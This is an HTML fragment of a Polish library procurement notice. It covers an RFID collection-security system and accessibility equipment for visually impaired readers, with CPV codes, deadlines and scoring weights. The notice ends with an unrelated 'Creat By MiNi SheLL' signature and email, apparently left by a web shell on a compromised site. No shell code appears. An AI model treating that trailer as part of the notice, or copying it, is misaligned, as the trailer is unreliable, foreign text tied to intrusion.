<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kultury i ochrony dziedzictwa historycznego i kulturowego. 

Cz. 1. 
Bramka nadawczo-odbiorcza RFID; Inteligentny licznik osób odwiedzających zintegrowany z antenami bramek RFID; Przygotowanie wygrodzenia przy wejściu do biblioteki razem z bramkami RFID; Stanowisko wypożyczeń i zwrotów oraz kodowania etykiet przez bibliotekarza - zawiera czytnik/programator RFID, urządzenie jest ekranowane; Czytnik kart typu Mifare; Etykiety biblioteczne RFID; Mobilne skontrum RFID; Przemysłowa drukarka termotransferowa; Montaż urządzeń, Konfiguracja systemu, Wdrożenie informatyczne; Wrzutnia RFID zewnętrzna przystosowana do potrzeb osób niepełnosprawnych; Stanowisko samodzielnego wypożyczania RFID wolnostojące przystosowane do potrzeb osób niepełnosprawnych.
Szczegółowy opis zamówienia dla Cz. 1 został określony załączniku Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.80.00-6, 42.96.11.00-1, 48.73.00.00-4, 31.71.00.00-6, 48.00.00.00-8, 48.16.10.00-4, 48.16.00.00-7, 51.61.11.00-9, 39.15.51.00-4, 80.51.00.00-2, 33.19.62.99-2, 30.23.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Integracja - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest: zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi prior.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kultury i ochrony dziedzictwa historycznego i kulturowego. 
Cz. 2. 
Lupa przenośna; Lupa stała; Zestaw komputerowy; Multilektor; Program, w którym dostępna będzie funkcja: powiększająca, udźwiękowiająca i ubrajlawiający środowisko operacyjne.

Szczegółowy opis zamówienia dla Cz. 2 został określony załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.21.33.00-8, 30.23.00.00-0, 33.19.62.99-2, 48.00.00.00-8, 31.71.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com